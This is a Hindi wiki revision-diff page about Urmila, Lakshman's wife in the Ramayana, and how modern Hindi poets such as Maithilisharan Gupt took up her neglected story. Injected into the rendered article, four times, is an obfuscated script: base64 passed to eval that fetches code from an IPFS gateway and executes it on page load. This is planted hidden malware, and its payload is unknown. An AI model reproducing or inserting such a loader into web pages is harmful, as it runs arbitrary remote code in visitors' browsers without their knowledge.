Difference between revisions of "उर्मिला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 1: Line 1:
[[वाल्मीकि]] [[रामायण]] में [[लक्ष्मण]] की पत्नी के रूप में उर्मिला का नामोल्लेख मिलता है। [[महाभारत]], [[पुराण]] तथा काव्य में भी इससे अधिक उर्मिला का कोई परिचय नहीं मिलता। केवल आधुनिक काल में उर्मिला के विषय में विशेष सहानुभूति प्रकट की गयी है। युग की भावना से प्रेरित होकर आधुनिक युग में दलितों, पतितों और उपेक्षितों के उद्वार के जो प्रयत्न किये गये हैं उनमें प्राचीन काव्यों के विस्मृत और उपेक्षित पात्रों, विशेषकर स्त्री पात्रों का भी उच्चतम स्थान है।  
+
'''उर्मिला''' का नाम [[हिंदू|हिंदुओं]] के पवित्र धर्म ग्रंथ [[रामायण]] में [[लक्ष्मण]] की पत्नी के रूप में मिलता है। [[महाभारत]], [[पुराण]] तथा काव्य में भी इससे अधिक उर्मिला का कोई परिचय नहीं मिलता। केवल आधुनिक काल में उर्मिला के विषय में विशेष सहानुभूति प्रकट की गयी है। [[युग]] की भावना से प्रेरित होकर आधुनिक युग में दलितों, पतितों और उपेक्षितों के उद्वार के जो प्रयत्न किये गये हैं उनमें प्राचीन काव्यों के विस्मृत और उपेक्षित पात्रों, विशेषकर स्त्री पात्रों का भी उच्चतम स्थान है।  
*सर्वप्रथम महाकवि रवीन्द्रनाथ ठाकुर ने अपने एक निबन्ध में अत्यन्त भावुकतापूर्ण शैली में उपेक्षिता उर्मिला का स्मरण किया और आदिकवि वाल्मीकि तथा अन्य परवर्ती कवियों की उर्मिला-विषयक उदासीनता की आलोचना की।  
+
==परिचय==
*उसी लेख से प्रेरणा लेकर आचार्य महावीरप्रसाद द्विवेदी ने 'सरस्वती' में एक लेख लिखा और कवियों को उर्मिला का उद्धार करने का आह्वान किया।  
+
वाल्मिकी रामायण के अनुसार, उर्मिला [[जनक]] नंदनी [[सीता]] की छोटी बहन थीं और सीता के [[विवाह]] के समय ही [[दशरथ]] और [[सुमित्रा]] के [[पुत्र]] लक्ष्मण को ब्याही गई थीं। इनके [[अंगद (लक्ष्मण पुत्र)|अंगद]] और  चन्द्रकेतु नाम के दो पुत्र तथा सोमदा नाम की एक पुत्री थी। आधुनिक साहित्यकारों ने उर्मिला को विविध कलाओं में पारंगत और कर्तव्यपरायण नारी के रूप में चित्रित किया है। [[राम]] के साथ लक्ष्मण के भी चौदह वर्ष के लिए वन जाने पर उर्मिला ने अपनी विरह-व्यथा को जीव-जन्तुओं के प्रति सहानुभूति में बदल दिया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम= भारतीय संस्कृति कोश|लेखक=लीलाधर शर्मा पर्वतीय  |अनुवादक= |आलोचक= |प्रकाशक=राजपाल एन्ड सन्स दिल्ली  |संकलन= |संपादन= |पृष्ठ संख्या= 148|url=|ISBN=}}</ref>
*मैथिलीशरण गुप्त ने द्विवेदी जी के लेख से प्रेरणा लेकर 'उर्मिला-उत्ताप' रचना प्रारम्भ की। 'उर्मिला-उत्ताप' के चार सर्ग सन् 1920 के पहले ही रचे जा चुके थे किन्तु बाद में गुप्त जी ने अपनी रचना को सम्पूर्ण रामकथा का रूप देने का विचार किया और इसे 'साकेत' के नाम से रचकर प्रकाशित किया।  
+
==महत्त्वपूर्ण संदर्भ==
*राम कथा में उर्मिला जैसे एक गौण पात्र को जितनी प्रमुखता दी जा सकती थी, गुप्त जी ने उसे देने का भरपूर प्रयत्न किया। उन्होंने उर्मिला के अल्पकालीन संयोग का मनोहर चित्र देकर उसके दीर्घ और दारुण वियोग का अत्यन्त मार्मिक और प्रभावशाली चित्र देने में सफलता प्राप्त की।  
+
*सर्वप्रथम [[रवीन्द्रनाथ ठाकुर|महाकवि रवीन्द्रनाथ ठाकुर]] ने अपने एक निबन्ध में अत्यन्त भावुकतापूर्ण शैली में उपेक्षिता उर्मिला का स्मरण किया और [[वाल्मीकि|आदिकवि वाल्मीकि]] तथा अन्य परवर्ती कवियों की उर्मिला-विषयक उदासीनता की आलोचना की। उसी लेख से प्रेरणा लेकर [[महावीर प्रसाद द्विवेदी|आचार्य महावीर प्रसाद द्विवेदी]] ने '[[सरस्वती (पत्रिका)|सरस्वती]]' में एक लेख लिखा और कवियों को उर्मिला का उद्धार करने का आह्वान किया।  
*'साकेत' के नवम सर्ग में उर्मिला के विरही जीवन के बड़े ही मर्मस्पर्शी चित्र मिलते हैं। गुप्त जी ने इस चित्रांकन में प्राचीन कवियों के वर्णनों और उक्तियों का प्रयोग कर अपने काव्यानुशीलन का भी परिचय दिया है। 'साकेत' के अन्तिम सर्ग में [[लक्ष्मण]] और उर्मिला का पुनर्मिलन वैसा ही हृदयावर्जक है, जैसा कि प्रथम सर्ग में वर्णित उनका संयोगसुख आहलादकारी है।  
+
*[[मैथिलीशरण गुप्त]] ने द्विवेदी जी के लेख से प्रेरणा लेकर 'उर्मिला-उत्ताप' रचना प्रारम्भ की। 'उर्मिला-उत्ताप' के चार सर्ग सन् [[1920]] के पहले ही रचे जा चुके थे किन्तु बाद में गुप्त जी ने अपनी रचना को सम्पूर्ण रामकथा का रूप देने का विचार किया और इसे '[[साकेत (महाकाव्य)|साकेत]]' के नाम से रचकर प्रकाशित किया। राम कथा में उर्मिला जैसे एक गौण पात्र को जितनी प्रमुखता दी जा सकती थी, गुप्त जी ने उसे देने का भरपूर प्रयत्न किया। उन्होंने उर्मिला के अल्पकालीन संयोग का मनोहर चित्र देकर उसके दीर्घ और दारुण वियोग का अत्यन्त मार्मिक और प्रभावशाली चित्र देने में सफलता प्राप्त की। 'साकेत' के नवम सर्ग में उर्मिला के विरही जीवन के बड़े ही मर्मस्पर्शी चित्र मिलते हैं। गुप्त जी ने इस चित्रांकन में प्राचीन कवियों के वर्णनों और उक्तियों का प्रयोग कर अपने काव्यानुशीलन का भी परिचय दिया है। 'साकेत' के अन्तिम सर्ग में [[लक्ष्मण]] और उर्मिला का पुनर्मिलन वैसा ही हृदयावर्जक है, जैसा कि प्रथम सर्ग में वर्णित उनका संयोगसुख आहलादकारी है।  
*उर्मिला विषयक कुछ अन्य रचनाएँ भी हुई जिसमें बाल कृष्ण शर्मा 'नवीन' का 'उर्मिला' शीर्षक खण्डकाव्य विशेष उल्लेखनीय है। इस खण्डकाव्य में केवल उर्मिला विषयक घटना प्रसंगों को लेने के कारण कवि कथानक की एकात्मकता और स्वतन्त्रता को अधिक सुरक्षित रख सका है।  
+
*उर्मिला विषयक कुछ अन्य रचनाएँ भी हुई जिसमें [[बालकृष्ण शर्मा नवीन|बालकृष्ण शर्मा 'नवीन']] का 'उर्मिला' शीर्षक [[खण्डकाव्य]] विशेष उल्लेखनीय है। इस खण्डकाव्य में केवल उर्मिला विषयक घटना प्रसंगों को लेने के कारण कवि कथानक की एकात्मकता और स्वतन्त्रता को अधिक सुरक्षित रख सका है।  
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
'साकेत'; मैथिलीशरण गुप्त:  
+
* 'साकेत'; [[मैथिलीशरण गुप्त]]: <br />
'उर्मिला'; बालकृष्ण शर्मा 'नवीन)। 
+
* 'उर्मिला'; [[बालकृष्ण शर्मा नवीन|बालकृष्ण शर्मा 'नवीन']]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{रामायण}}{{पौराणिक चरित्र}}  
 
{{रामायण}}{{पौराणिक चरित्र}}  
Line 19: Line 18:
 
[[Category:रामायण]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
[[Category:रामायण]][[Category:प्रसिद्ध चरित्र और मिथक कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:50, 18 February 2013

urmila ka nam hianduoan ke pavitr dharm granth ramayan mean lakshman ki patni ke roop mean milata hai. mahabharat, puran tatha kavy mean bhi isase adhik urmila ka koee parichay nahian milata. keval adhunik kal mean urmila ke vishay mean vishesh sahanubhooti prakat ki gayi hai. yug ki bhavana se prerit hokar adhunik yug mean dalitoan, patitoan aur upekshitoan ke udvar ke jo prayatn kiye gaye haian unamean prachin kavyoan ke vismrit aur upekshit patroan, visheshakar stri patroan ka bhi uchchatam sthan hai.

parichay

valmiki ramayan ke anusar, urmila janak nandani sita ki chhoti bahan thian aur sita ke vivah ke samay hi dasharath aur sumitra ke putr lakshman ko byahi gee thian. inake aangad aur chandraketu nam ke do putr tatha somada nam ki ek putri thi. adhunik sahityakaroan ne urmila ko vividh kalaoan mean parangat aur kartavyaparayan nari ke roop mean chitrit kiya hai. ram ke sath lakshman ke bhi chaudah varsh ke lie van jane par urmila ne apani virah-vyatha ko jiv-jantuoan ke prati sahanubhooti mean badal diya.[1]

mahattvapoorn sandarbh

  • sarvapratham mahakavi ravindranath thakur ne apane ek nibandh mean atyant bhavukatapoorn shaili mean upekshita urmila ka smaran kiya aur adikavi valmiki tatha any paravarti kaviyoan ki urmila-vishayak udasinata ki alochana ki. usi lekh se prerana lekar achary mahavir prasad dvivedi ne 'sarasvati' mean ek lekh likha aur kaviyoan ko urmila ka uddhar karane ka ahvan kiya.
  • maithilisharan gupt ne dvivedi ji ke lekh se prerana lekar 'urmila-uttap' rachana prarambh ki. 'urmila-uttap' ke char sarg sanh 1920 ke pahale hi rache ja chuke the kintu bad mean gupt ji ne apani rachana ko sampoorn ramakatha ka roop dene ka vichar kiya aur ise 'saket' ke nam se rachakar prakashit kiya. ram katha mean urmila jaise ek gaun patr ko jitani pramukhata di ja sakati thi, gupt ji ne use dene ka bharapoor prayatn kiya. unhoanne urmila ke alpakalin sanyog ka manohar chitr dekar usake dirgh aur darun viyog ka atyant marmik aur prabhavashali chitr dene mean saphalata prapt ki. 'saket' ke navam sarg mean urmila ke virahi jivan ke b de hi marmasparshi chitr milate haian. gupt ji ne is chitraankan mean prachin kaviyoan ke varnanoan aur uktiyoan ka prayog kar apane kavyanushilan ka bhi parichay diya hai. 'saket' ke antim sarg mean lakshman aur urmila ka punarmilan vaisa hi hridayavarjak hai, jaisa ki pratham sarg mean varnit unaka sanyogasukh ahaladakari hai.
  • urmila vishayak kuchh any rachanaean bhi huee jisamean balkrishna sharma 'navin' ka 'urmila' shirshak khandakavy vishesh ullekhaniy hai. is khandakavy mean keval urmila vishayak ghatana prasangoan ko lene ke karan kavi kathanak ki ekatmakata aur svatantrata ko adhik surakshit rakh saka hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. bharatiy sanskriti kosh |lekhak: liladhar sharma parvatiy |prakashak: rajapal end sans dilli |prishth sankhya: 148 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>